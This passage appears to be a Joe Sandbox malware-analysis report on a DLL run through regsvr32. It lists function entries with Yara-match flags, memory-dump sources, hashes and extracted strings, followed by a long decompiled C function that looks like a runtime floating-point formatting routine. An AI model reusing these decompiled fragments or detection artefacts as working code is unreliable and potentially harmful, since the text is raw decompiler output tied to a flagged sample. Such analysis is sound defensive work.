                                                                              • Opcode ID: 35aa661e9c5ead70071f304cd60573a70c40340e8e9f91ee4e4ad769fe25239e
                                                                              • Instruction ID: 8469cb49fad46c0d7939413c2a9e84f3bc38bcfe44728c3119b1d687a2602661
                                                                              • Opcode Fuzzy Hash: 35aa661e9c5ead70071f304cd60573a70c40340e8e9f91ee4e4ad769fe25239e
                                                                              • Instruction Fuzzy Hash: 87314D76204B8586E711CF11E8403CAB361F789BE8F901212EED917B98CF7CE555CB40
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 000000018000445C Relevance: 7.1, Strings: 5, Instructions: 813COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.943069664.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: !g$!g$-{e$.9Y$7cm
                                                                              • API String ID: 0-3613756181
                                                                              • Opcode ID: 8466a7fe0396b74cedb6887ba44c1057051f2a552123ac4d034c792a786adc4e
                                                                              • Instruction ID: bf5508b14f48093895fd1996fdb0e85e6185e8dd26636c64e6a2ba956b5e503a
                                                                              • Opcode Fuzzy Hash: 8466a7fe0396b74cedb6887ba44c1057051f2a552123ac4d034c792a786adc4e
                                                                              • Instruction Fuzzy Hash: 409231711483CB8BCB78CF54C845BEEBBE1FB84704F10852CE86A8BA51E7B49649DB41
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 10001010 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 31libraryloaderCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.942654712.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                              • Associated: 00000003.00000002.942649727.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942884990.0000000010054000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942903120.000000001006E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942909111.0000000010074000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942916757.0000000010078000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942975725.0000000010083000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                              Similarity
                                                                              • API ID: AddressHandleLibraryLoadModuleProc
                                                                              • String ID: ImageList_Draw
                                                                              • API String ID: 310444273-2074868843
                                                                              • Opcode ID: 2e0cfae6a7ed4f8b9934caa78c3054886dabdb1ee2fb3c787052dd6648a7fb46
                                                                              • Instruction ID: 969655b72c4b8be381c47ac264721fd361756cc5da4d0145757a9f5267f53b0c
                                                                              • Opcode Fuzzy Hash: 2e0cfae6a7ed4f8b9934caa78c3054886dabdb1ee2fb3c787052dd6648a7fb46
                                                                              • Instruction Fuzzy Hash: 2F019236202F81C5EB058F29E98038973A5F759B88F69402ACB8C47768DF79C8E5CB40
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 00000001800054D8 Relevance: 6.8, Strings: 5, Instructions: 573COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.943069664.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: Ol$`P$i($km}&$ttR
                                                                              • API String ID: 0-1254889785
                                                                              • Opcode ID: 9493bf0160dfff7cf218a8f761ba212010c51dc1cc37675f8f08f25cb4825c85
                                                                              • Instruction ID: 987162bd0b035dc474e6baf50d73a519649db35efcc54d1c771acda0ad58d409
                                                                              • Opcode Fuzzy Hash: 9493bf0160dfff7cf218a8f761ba212010c51dc1cc37675f8f08f25cb4825c85
                                                                              • Instruction Fuzzy Hash: 57422870908B488FD769CF79C48965EBBF1FB88748F204A1DE6A297271DB709845CF42
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 0000000180002888 Relevance: 6.4, Strings: 5, Instructions: 185COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.943069664.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: <jG$PXf$]V.$fE$2>
                                                                              • API String ID: 0-2974598014
                                                                              • Opcode ID: bad49f1636925e4aa97c527113884a17b5682b6c71c0135986e4f76ada5c5575
                                                                              • Instruction ID: 93145a700ffc0e4eb939e50d890ad0ed9c26548b847d798d32bc26a6146f6c62
                                                                              • Opcode Fuzzy Hash: bad49f1636925e4aa97c527113884a17b5682b6c71c0135986e4f76ada5c5575
                                                                              • Instruction Fuzzy Hash: 3FA1E9716097C88FDBBADF68C84A7CB7BE4FB49704F50461DD88A8A250CBB45649CB42
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 0000000180026A64 Relevance: 6.4, Strings: 5, Instructions: 132COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.943069664.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: -$<yH$`Zx$i,$i,
                                                                              • API String ID: 0-409805761
                                                                              • Opcode ID: f6182156d312c6874ac13020d1629895101c3b27d9b9d95c05b51086f9e303f4
                                                                              • Instruction ID: e265554e7eca7cf7370185f19b3f513919126148552d798dab9d7d185450bf95
                                                                              • Opcode Fuzzy Hash: f6182156d312c6874ac13020d1629895101c3b27d9b9d95c05b51086f9e303f4
                                                                              • Instruction Fuzzy Hash: 1F511D70E0470ECFCB59CFA8D4956EFBBB6EB44384F00816DD406A6290DB749B59CB85
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 10011FC8 Relevance: 6.0, APIs: 4, Instructions: 49keyboardwindowCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.942654712.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                              • Associated: 00000003.00000002.942649727.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942884990.0000000010054000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942903120.000000001006E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942909111.0000000010074000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942916757.0000000010078000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942975725.0000000010083000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                              Similarity
                                                                              • API ID: State$LongMessageSendWindow
                                                                              • String ID:
                                                                              • API String ID: 1063413437-0
                                                                              • Opcode ID: 0bbe8b1784c73b67172720afbdbc0bbffd8bb83d95128cb49022aa16dfccae95
                                                                              • Instruction ID: 37b9e25aff17aae62ce746fe82484b4cb0a7aec96ad8ed6f1bc60ad2a385e508
                                                                              • Opcode Fuzzy Hash: 0bbe8b1784c73b67172720afbdbc0bbffd8bb83d95128cb49022aa16dfccae95
                                                                              • Instruction Fuzzy Hash: A401F77530018546FA559B55E8553D81251EF4CFD0F8A4434EF860B746CEB8C8D79710
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 1004F8A0 Relevance: 5.9, Strings: 4, Instructions: 945COMMONCrypto
                                                                              Download Yara Rule
                                                                              C-Code - Quality: 95%
                                                                              			E1004F8A0(signed int __edx, long long __rbx, signed long long __rcx, void* __rdx, long long __rdi, long long __rsi, long long __rbp, void* __r8, signed short* __r9, long long __r12, long long __r13, long long __r14, long long __r15) {
				long long _v8;
				long long _v16;
				void* _v24;
				void* _v32;
				long long _v40;
				long long _v48;
				long long _v56;
				long long _v64;
				signed int _v88;
				intOrPtr _v96;
				signed int _v102;
				unsigned int _v104;
				signed short _v110;
				signed int _v112;
				signed int _v116;
				signed int _v120;
				char _v125;
				signed int _v126;
				signed int _v128;
				signed int _v130;
				signed int _v132;
				signed int _v134;
				unsigned int _v136;
				signed int _v142;
				signed int _v144;
				signed int _v146;
				signed int _v148;
				signed int _v150;
				signed int _v152;
				void* _v160;
				signed int _v168;
				signed int _v176;
				signed int _v180;
				signed int _v184;
				long long _v192;
				signed int _v196;
				signed int _v198;
				signed short _v200;
				long long _v216;
				signed short _t299;
				signed int _t300;
				signed int _t328;
				unsigned int _t332;
				signed short _t340;
				signed short _t342;
				signed short _t343;
				signed int _t344;
				signed int _t348;
				signed int _t350;
				signed short _t367;
				signed short _t368;
				signed short _t372;
				signed short _t373;
				signed int _t374;
				intOrPtr _t378;
				signed int _t380;
				signed int _t394;
				signed int _t395;
				signed int _t396;
				signed int _t398;
				signed int _t400;
				signed int _t402;
				signed int _t413;
				unsigned int _t433;
				signed short _t437;
				signed short _t438;
				signed int _t440;
				signed int _t445;
				signed short _t446;
				signed short _t447;
				signed int _t449;
				signed int _t453;
				signed short _t456;
				unsigned int _t473;
				signed int _t475;
				signed int _t476;
				signed int _t477;
				signed short _t482;
				signed int _t483;
				void* _t494;
				signed int _t495;
				void* _t496;
				unsigned int _t497;
				signed int _t500;
				signed int _t501;
				signed short _t502;
				signed int _t503;
				void* _t504;
				signed int _t505;
				void* _t507;
				signed int _t508;
				signed long long _t516;
				unsigned long long _t517;
				unsigned long long _t519;
				long long _t523;
				signed long long _t525;
				intOrPtr* _t529;
				void* _t530;
				void* _t535;
				long long _t537;
				long long* _t538;
				signed int* _t539;
				signed int* _t540;
				signed short* _t543;
				long long _t547;
				signed int* _t548;
				signed long long _t550;
				void* _t551;
				signed short* _t556;
				signed int* _t557;
				signed int* _t558;
				signed int _t559;
				signed int _t560;
				signed long long _t561;
				signed short* _t562;
				signed short* _t563;
				long long _t564;
				long long _t566;
				signed int* _t567;
				long long _t569;
				long long _t571;
				signed int* _t573;

				_t571 = __r15;
				_t569 = __r14;
				_t566 = __r13;
				_t564 = __r12;
				_t556 = __r9;
				_t551 = __r8;
				_t547 = __rbp;
				_t545 = __rsi;
				_t535 = __rdx;
				_t525 = __rcx;
				_t523 = __rbx;
				_t561 = _t550;
				_t516 =  *0x1006f4c8; // 0x6f13091946cb
				_t517 = _t516 ^ _t550;
				_v88 = _t517;
				r10d =  *(__rcx + 8) & 0x0000ffff;
				 *((long long*)(_t561 - 0x18)) = __rsi;
				_v180 = __edx;
				 *((long long*)(_t561 - 0x20)) = __rdi;
				r10w = r10w & 0x00007fff;
				_t456 = r10w & 0x8000;
				_v160 = __r9;
				 *((char*)(_t561 - 0x78)) = 0xcc;
				_t543 = __r9;
				r9d =  *(__rcx + 4);
				 *((char*)(_t561 - 0x77)) = 0xcc;
				 *((char*)(_t561 - 0x76)) = 0xcc;
				 *((char*)(_t561 - 0x75)) = 0xcc;
				 *((char*)(_t561 - 0x74)) = 0xcc;
				 *((char*)(_t561 - 0x73)) = 0xcc;
				 *((char*)(_t561 - 0x72)) = 0xcc;
				 *((char*)(_t561 - 0x71)) = 0xcc;
				 *((char*)(_t561 - 0x70)) = 0xcc;
				 *((char*)(_t561 - 0x6f)) = 0xcc;
				 *((char*)(_t561 - 0x6e)) = 0xfb;
				 *((char*)(_t561 - 0x6d)) = 0x3f;
				r11d =  *__rcx;
				_v168 = r8d;
				_t502 = 1;
				_v200 = _t456;
				if(_t456 == 0) {
					 *((char*)(__r9 + 2)) = 0x20;
				} else {
					 *((char*)(__r9 + 2)) = 0x2d;
				}
				_v8 = _t523;
				_v16 = _t547;
				_v40 = _t564;
				_v48 = _t566;
				if(r10w != 0) {
					__eflags = r10w - 0x7fff;
					if (r10w != 0x7fff) goto L23;
					__eflags = r9d - 0x80000000;
					 *_t543 = _t502;
					if (r9d != 0x80000000) goto 0x1004f9c4;
					__eflags = r11d;
					if (__eflags == 0) goto L10;
					asm("inc ecx");
					if(__eflags < 0) {
						__eflags = _t456;
						if(_t456 == 0) {
							L15:
							__eflags = r9d - 0x80000000;
							if(r9d != 0x80000000) {
								L20:
								_t396 = E10047020(_t517, _t523,  &(_t543[2]), _t535, _t543, _t545, _t547, "1#QNAN");
								_t407 = 0;
								__eflags = _t396;
								if(_t396 != 0) {
									r9d = 0;
									r8d = 0;
									_t409 = 0;
									__eflags = 0;
									_v216 = _t523;
									E1003C6F0(0, _t535, "1#QNAN");
								}
								L22:
								_t543[1] = 6;
								_t502 = _t407;
								L185:
								return E10038D20(_t409, _v88 ^ _t550);
							}
							__eflags = r11d;
							if(r11d != 0) {
								goto L20;
							} else {
								_t553 = "1#INF";
								_t398 = E10047020(_t517, _t523,  &(_t543[2]), _t535, _t543, _t545, _t547, "1#INF");
								_t408 = 0;
								__eflags = _t398;
								if(_t398 != 0) {
									r9d = 0;
									r8d = 0;
									_t409 = 0;
									__eflags = 0;
									_v216 = _t523;
									E1003C6F0(0, _t535, _t553);
								}
								L19:
								_t543[1] = 5;
								_t502 = _t408;
								goto L185;
							}
						}
						__eflags = r9d - 0xc0000000;
						if(r9d != 0xc0000000) {
							goto L15;
						}
						__eflags = r11d;
						if(r11d != 0) {
							goto L20;
						}
						_t554 = "1#IND";
						_t400 = E10047020(_t517, _t523,  &(_t543[2]), _t535, _t543, _t545, _t547, "1#IND");
						_t408 = 0;
						__eflags = _t400;
						if(_t400 == 0) {
							goto L19;
						} else {
							r9d = 0;
							r8d = 0;
							_t409 = 0;
							_v216 = _t523;
							E1003C6F0(0, _t535, _t554);
							_t543[1] = 5;
							_t502 = 0;
							goto L185;
						}
					}
					_t402 = E10047020(_t517, _t523,  &(_t543[2]), _t535, _t543, _t545, _t547, "1#SNAN");
					_t407 = 0;
					__eflags = _t402;
					if(_t402 == 0) {
						goto L22;
					} else {
						r9d = 0;
						r8d = 0;
						_t409 = 0;
						_v216 = _t523;
						E1003C6F0(0, _t535, "1#SNAN");
						_t543[1] = 6;
						_t502 = 0;
						goto L185;
					}
				}
				if(r9d != 0 || r11d != 0) {
					r8d = r10w & 0xffffffff;
					_v126 = r10w;
					_v134 = r11d;
					r11d = 5;
					r8d = r8d * 0x4d10;
					_v56 = _t569;
					_v130 = r9d;
					_v64 = _t571;
					_v136 = 0;
					_v176 = r11d;
					_t56 = _t551 - 0x134312f4; // -323162851
					_t494 = 0x7fff8000;
					_t413 = _t535 + _t56 >> 0x10;
					_t537 = 0x10070ac0;
					__eflags = 0x10070b20;
					r12d = 0xffff8000;
					r10d = _t413;
					_v196 = _t413;
					r10d =  ~r10d;
					if(0x10070b20 == 0) {
						L92:
						r9d = _v132;
						r8d = _v136;
						L93:
						_t299 = _v128 >> 0x10;
						__eflags = _t299 - 0x3fff;
						if(_t299 < 0x3fff) {
							L154:
							__eflags = _v168 & 0x00000001;
							_t567 = _v160;
							_t300 = _v196;
							 *_t567 = _t300;
							if((_v168 & 0x00000001) == 0) {
								_t495 = _v180;
								L158:
								r10d = _v128;
								__eflags = _t495 - 0x15;
								_v126 = 0;
								_t496 =  >  ? 0x15 : _t495;
								r9d = r9d + r9d;
								r8d = r8d + r8d;
								r10d = r10d >> 0x10;
								r9d = r9d | r8d >> 0x0000001f;
								r8d = r8d + r8d;
								r9d = r9d + r9d;
								r9d = r9d | r8d >> 0x0000001f;
								r9d = r9d + r9d;
								r9d = r9d | r8d >> 0x0000001f;
								r9d = r9d + r9d;
								r8d = r8d + r8d;
								r8d = r8d + r8d;
								r9d = r9d | r8d >> 0x0000001f;
								r8d = r8d + r8d;
								r9d = r9d + r9d;
								r9d = r9d | r8d >> 0x0000001f;
								r9d = r9d + r9d;
								r8d = r8d + r8d;
								r9d = r9d | r8d >> 0x0000001f;
								r9d = r9d + r9d;
								r8d = r8d + r8d;
								r9d = r9d | r8d >> 0x0000001f;
								r9d = r9d + r9d;
								r8d = r8d + r8d;
								r11d = _t537 + _t537;
								r9d = r9d | r8d >> 0x0000001f;
								_t409 = r9d >> 0x1f;
								_v136 = r8d;
								r11d = r11d | r9d >> 0x0000001f;
								_v132 = r9d;
								r10d = r10d - 0x3ffe;
								__eflags = r10d;
								_v128 = r11d;
								if(r10d >= 0) {
									L163:
									r12d =  &(_t543[0]);
									_t548 =  &(_t567[1]);
									__eflags = r12d;
									_t557 = _t548;
									if(r12d <= 0) {
										L177:
										_t558 = _t557 - 2;
										__eflags = ( *(_t557 - 1) & 0x000000ff) - 0x35;
										if(( *(_t557 - 1) & 0x000000ff) < 0x35) {
											__eflags = _t558 - _t548;
											if(_t558 < _t548) {
												L190:
												__eflags = _t558 - _t548;
												if(_t558 >= _t548) {
													L184:
													r10b = r10b - r13b;
													r10b = r10b - 3;
													__eflags = r10b;
													_t567[0] = r10b;
													 *((char*)( &(_t567[1]) + r10b)) = 0;
													goto L185;
												}
												__eflags = _v200 - 0x8000;
												_t409 = 0x2d;
												_t323 =  ==  ? 0x2d : 0x20;
												 *_t567 = 0;
												_t567[0] = 1;
												 *_t548 = 0x30;
												_t567[1] = 0;
												_t567[0] =  ==  ? 0x2d : 0x20;
												goto L185;
											}
											while(1) {
												__eflags =  *_t558 - 0x30;
												if( *_t558 != 0x30) {
													goto L190;
												}
												_t558 = _t558 - 1;
												__eflags = _t558 - _t548;
												if(_t558 >= _t548) {
													continue;
												}
												goto L190;
											}
											goto L190;
										}
										__eflags = _t558 - _t548;
										if(_t558 < _t548) {
											L181:
											__eflags = _t558 - _t548;
											if(_t558 < _t548) {
												_t558 =  &(_t558[0]);
												 *_t567 =  *_t567 + 1;
												__eflags =  *_t567;
											}
											 *_t558 =  *_t558 + 1;
											__eflags =  *_t558;
											goto L184;
										} else {
											goto L179;
										}
										while(1) {
											L179:
											__eflags =  *_t558 - 0x39;
											if( *_t558 != 0x39) {
												goto L181;
											}
											 *_t558 = 0x30;
											_t558 = _t558 - 1;
											__eflags = _t558 - _t548;
											if(_t558 >= _t548) {
												continue;
											}
											goto L181;
										}
										goto L181;
									}
									while(1) {
										_t260 =  &_v136; // 0xffff8070
										_t529 = _t260;
										_t261 =  &_v104; // 0xffff8090
										_t538 = _t261;
										 *_t538 =  *_t529;
										 *((intOrPtr*)(_t538 + 8)) =  *((intOrPtr*)(_t529 + 8));
										_t473 = _t551 + _t551;
										r8d = _t556 + _t556;
										r8d = r8d | r8d >> 0x0000001f;
										r9d = _t561 + _t561;
										r9d = r9d | r9d >> 0x0000001f;
										_t328 = _t473 >> 0x1f;
										r8d = r8d + r8d;
										r8d = r8d | _t328;
										_t519 = _v104;
										r11d = _t556 + _t556;
										_t497 = _t519 + _t538;
										r11d = r11d | r8d >> 0x0000001f;
										__eflags = _t497 - _t473 + _t473;
										if(_t497 < _t473 + _t473) {
											goto L167;
										}
										__eflags = _t497 - _t328;
										if(_t497 >= _t328) {
											L172:
											r9d = _t551 + (_t519 >> 0x20);
											__eflags = r9d - r8d;
											if(r9d < r8d) {
												L174:
												r11d = r11d + 1;
												__eflags = r11d;
												L175:
												r11d = r11d + _v96;
												r9d = r9d + r9d;
												_t409 = r9d >> 0x1f;
												r8d = _t543 + _t543;
												r12d = r12d - 1;
												_t557 =  &(_t557[0]);
												r9d = r9d | _t497 >> 0x0000001f;
												_v136 = r8d;
												_t332 = _t561 + _t561 | r9d >> 0x0000001f;
												_v132 = r9d;
												_v128 = _t332;
												_v125 = 0;
												__eflags = r12d;
												 *(_t557 - 1) = (_t332 >> 0x18) + 0x30;
												if(r12d <= 0) {
													goto L177;
												}
												r11d = _v128;
												continue;
											}
											__eflags = r9d - _t328;
											if(r9d >= _t328) {
												goto L175;
											}
											goto L174;
										}
										L167:
										_t433 = _t551 + 1;
										_t475 = 0;
										__eflags = _t433 - r8d;
										if(_t433 < r8d) {
											L169:
											_t475 = _t502;
											L170:
											__eflags = _t475;
											r8d = _t433;
											if(_t475 != 0) {
												r11d = r11d + 1;
												__eflags = r11d;
											}
											goto L172;
										}
										__eflags = _t433 - 1;
										if(_t433 >= 1) {
											goto L170;
										}
										goto L169;
									}
								}
								r10d =  ~r10d;
								_t476 = r10b & 0xffffffff;
								__eflags = _t476;
								if(_t476 <= 0) {
									goto L163;
								}
								do {
									r8d = r8d >> 1;
									r9d = r9d >> 1;
									_t409 = r9d << 0x1f;
									_t476 = _t476 - 1;
									r11d = r11d >> 1;
									r9d = r9d | r11d << 0x0000001f;
									r8d = r8d | r9d << 0x0000001f;
									__eflags = _t476;
								} while (_t476 > 0);
								_v132 = r9d;
								_v136 = r8d;
								_v128 = r11d;
								goto L163;
							}
							_t495 = _v180 + _t300;
							__eflags = _t495;
							if(_t495 > 0) {
								goto L158;
							}
							__eflags = _v200 - 0x8000;
							_t409 = 0x2d;
							_t339 =  ==  ? 0x2d : 0x20;
							 *_t567 = 0;
							_t567[0] = 1;
							_t567[1] = 0x30;
							_t567[1] = 0;
							_t567[0] =  ==  ? 0x2d : 0x20;
							goto L185;
						}
						r14d = 0;
						_v152 = 0;
						_v196 = _t413 + 1;
						_t437 = _v110 & 0x0000ffff;
						_v148 = 0;
						r15d = _t437 & 0x0000ffff;
						_t438 = _t437 & 0x00007fff;
						_v144 = 0;
						r15w = r15w ^ _t299;
						_t340 = _t299 & 0x00007fff;
						r15w = r15w & 0x00008000;
						__eflags = _t340 - 0x7fff;
						_t504 = _t517 + _t525;
						if(_t340 >= 0x7fff) {
							L153:
							__eflags = r15w;
							r9d = 0;
							r8d = 0;
							_t499 =  !=  ? r12d : _t494;
							_v128 =  !=  ? r12d : _t494;
							goto L154;
						}
						__eflags = _t438 - 0x7fff;
						if(_t438 >= 0x7fff) {
							goto L153;
						}
						__eflags = _t504 - 0xbffd;
						if(_t504 > 0xbffd) {
							goto L153;
						}
						__eflags = _t504 - 0x3fbf;
						if(_t504 > 0x3fbf) {
							__eflags = _t340;
							if(_t340 != 0) {
								L104:
								__eflags = _t438;
								if(_t438 != 0) {
									L109:
									r13d = 0;
									_t177 =  &_v148; // 0xffff8064
									_t539 = _t177;
									do {
										__eflags = r11d;
										_t500 = r11d;
										_t530 = _t566 + _t566;
										if(r11d <= 0) {
											goto L125;
										}
										r12d = r13d;
										_t179 =  &_v112; // 0xffff8088
										_t559 = _t179;
										_t181 = _t530 + 0x70; // 0xffff8070
										_t562 = _t550 + _t181;
										r12d = r12d & 0x00000001;
										__eflags = r12d;
										do {
											_t440 = ( *_t559 & 0x0000ffff) * ( *_t562 & 0x0000ffff);
											__eflags = r12d;
											if(r12d == 0) {
												r8d = 0;
												r9d = _t517 + _t530;
												__eflags = r9d -  *(_t539 - 4);
												if(r9d <  *(_t539 - 4)) {
													L119:
													r8d = _t502;
													L120:
													 *(_t539 - 4) = r9d;
													goto L121;
												}
												__eflags = r9d - _t440;
												if(r9d >= _t440) {
													goto L120;
												}
												goto L119;
											}
											r8d = 0;
											r9d = _t517 + _t530;
											__eflags = r9d -  *(_t539 - 4);
											if(r9d <  *(_t539 - 4)) {
												L115:
												r8d = _t502;
												L116:
												 *(_t539 - 4) = r9d;
												goto L121;
											}
											__eflags = r9d - _t440;
											if(r9d >= _t440) {
												goto L116;
											}
											goto L115;
											L121:
											__eflags = r8d;
											if(r8d != 0) {
												 *_t539 =  *_t539 + 1;
												__eflags =  *_t539;
											}
											_t500 = _t500 - 1;
											_t562 =  &(_t562[1]);
											_t559 = _t559 - 2;
											__eflags = _t500;
										} while (_t500 > 0);
										r11d = _v176;
										L125:
										r11d = r11d - 1;
										_t539 =  &(_t539[0]);
										r13d = r13d + 1;
										__eflags = r11d;
										_v176 = r11d;
									} while (r11d > 0);
									_t505 = _t504 + 0xc002;
									__eflags = _t505;
									if(__eflags <= 0) {
										r9d = _v144;
										_t477 = _v148;
										r8d = _v152;
										L140:
										_t505 = _t505 + 0xffff;
										__eflags = _t505;
										if(_t505 >= 0) {
											L132:
											_t342 = _v152 & 0x0000ffff;
											L133:
											__eflags = _t342 - 0x8000;
											if(_t342 > 0x8000) {
												L135:
												_t343 = _v150;
												__eflags = _t343 - 0xffffffff;
												if(_t343 != 0xffffffff) {
													_t344 = _t343 + 1;
													__eflags = _t344;
													_v150 = _t344;
													_t477 = _v148;
												} else {
													_t348 = _v146;
													_v150 = 0;
													__eflags = _t348 - 0xffffffff;
													if(_t348 != 0xffffffff) {
														_v146 = _t348 + 1;
														r9d = _v144;
														_t477 = _v148;
													} else {
														_t350 = _v142 & 0x0000ffff;
														_v146 = 0;
														__eflags = _t350 - 0xffff;
														if(_t350 != 0xffff) {
															_t477 = _v148;
															_v142 = _t350 + 1;
															r9d = _v144;
														} else {
															_t477 = _v148;
															_v142 = 0x8000;
															r9d = _v144;
															_t505 = _t505 + 1;
														}
													}
												}
												L150:
												__eflags = _t505 - 0x7fff;
												if(_t505 < 0x7fff) {
													_v134 = _t477;
													_v130 = r9d;
													r9d = _v132;
													_v136 = _v150 & 0x0000ffff;
													r8d = _v136;
													_v126 = _t505 | r15w;
												} else {
													__eflags = r15w;
													_t347 =  !=  ? 0xffff8000 : 0x7fff8000;
													r9d = 0;
													r8d = 0;
													_v128 =  !=  ? 0xffff8000 : 0x7fff8000;
												}
												goto L154;
											}
											r8d = r8d & 0x0001ffff;
											__eflags = r8d - 0x18000;
											if(r8d != 0x18000) {
												goto L150;
											}
											goto L135;
										}
										r10d =  ~(_t505 & 0x0000ffff) & 0x0000ffff;
										_t505 = _t505 + r10w;
										__eflags = _t505;
										do {
											__eflags = _v152 & 0x00000001;
											if((_v152 & 0x00000001) != 0) {
												r14d = r14d + 1;
												__eflags = r14d;
											}
											r8d = r8d >> 1;
											r8d = r8d | _t477 << 0x0000001f;
											r9d = r9d >> 1;
											_t477 = _t477 >> 0x00000001 | r9d << 0x0000001f;
											_t559 = _t559 - 1;
											__eflags = _t559;
											_v152 = r8d;
										} while (_t559 != 0);
										__eflags = r14d;
										_v148 = _t477;
										_v144 = r9d;
										if(r14d == 0) {
											goto L132;
										}
										_t342 = r8w | 0x00000001;
										_v152 = _t342;
										r8d = _v152;
										goto L133;
									}
									r9d = _v144;
									_t477 = _v148;
									r8d = _v152;
									while(1) {
										asm("inc ecx");
										if(__eflags < 0) {
											break;
										}
										r9d = r9d + r9d;
										_t445 = _t477 >> 0x1f;
										r8d = r8d + r8d;
										_t477 = _t477 + _t477 | r8d >> 0x0000001f;
										r9d = r9d | _t445;
										_t505 = _t505 + 0xffff;
										_v148 = _t477;
										_v144 = r9d;
										__eflags = _t505;
										_v152 = r8d;
										if(__eflags > 0) {
											continue;
										}
										goto L140;
									}
									__eflags = _t505;
									if(_t505 <= 0) {
										goto L140;
									}
									goto L132;
								}
								_t504 = _t504 + 1;
								asm("btr eax, 0x1f");
								__eflags = _v112;
								if(_v112 != 0) {
									goto L109;
								}
								__eflags = _v116;
								if(_v116 != 0) {
									goto L109;
								}
								__eflags = _v120;
								if(_v120 != 0) {
									goto L109;
								}
								_v128 = 0;
								r9d = 0;
								r8d = 0;
								goto L154;
							}
							_t504 = _t504 + 1;
							asm("btr eax, 0x1f");
							__eflags = _v128;
							if(_v128 != 0) {
								goto L104;
							}
							__eflags = r9d;
							if(r9d != 0) {
								goto L104;
							}
							__eflags = r8d;
							if(r8d != 0) {
								goto L104;
							}
							_v126 = 0;
							goto L154;
						}
						_v128 = 0;
						r9d = 0;
						r8d = 0;
						goto L154;
					}
					__eflags = r10d;
					if(r10d < 0) {
						r10d =  ~r10d;
						_t537 = 0x10070c20;
						__eflags = 0x10070c80;
					}
					__eflags = r10d;
					if(r10d == 0) {
						goto L92;
					} else {
						r9d = _v132;
						r8d = _v136;
						do {
							_t537 = _t537 + 0x54;
							r10d = r10d >> 3;
							__eflags = r10d & 0x00000007;
							_v184 = r10d;
							_v192 = _t537;
							if((r10d & 0x00000007) == 0) {
								goto L90;
							}
							_t525 = _t517 + _t517 * 2;
							__eflags =  *((short*)(_t537 + _t525 * 4)) - 0x8000;
							_t573 = _t537 + _t525 * 4;
							if( *((short*)(_t537 + _t525 * 4)) >= 0x8000) {
								_t68 =  &_v104; // 0xffff8090
								_t525 = _t68;
								 *_t525 =  *_t573;
								_t394 = _t573[2];
								_t70 =  &_v104; // 0xffff8090
								_t573 = _t70;
								 *(_t525 + 8) = _t394;
								_t517 = _v104 >> 0x10;
								_t395 = _t394 - 1;
								__eflags = _t395;
								_v102 = _t395;
							}
							_t446 = _t573[2] & 0x0000ffff;
							_t367 = _v126 & 0x0000ffff;
							_v152 = 0;
							_t447 = _t446 & 0x00007fff;
							_v148 = 0;
							_t368 = _t367 & 0x00007fff;
							_v144 = 0;
							_t482 = (_t446 & 0x0000ffff ^ _t367) & 0x00008000;
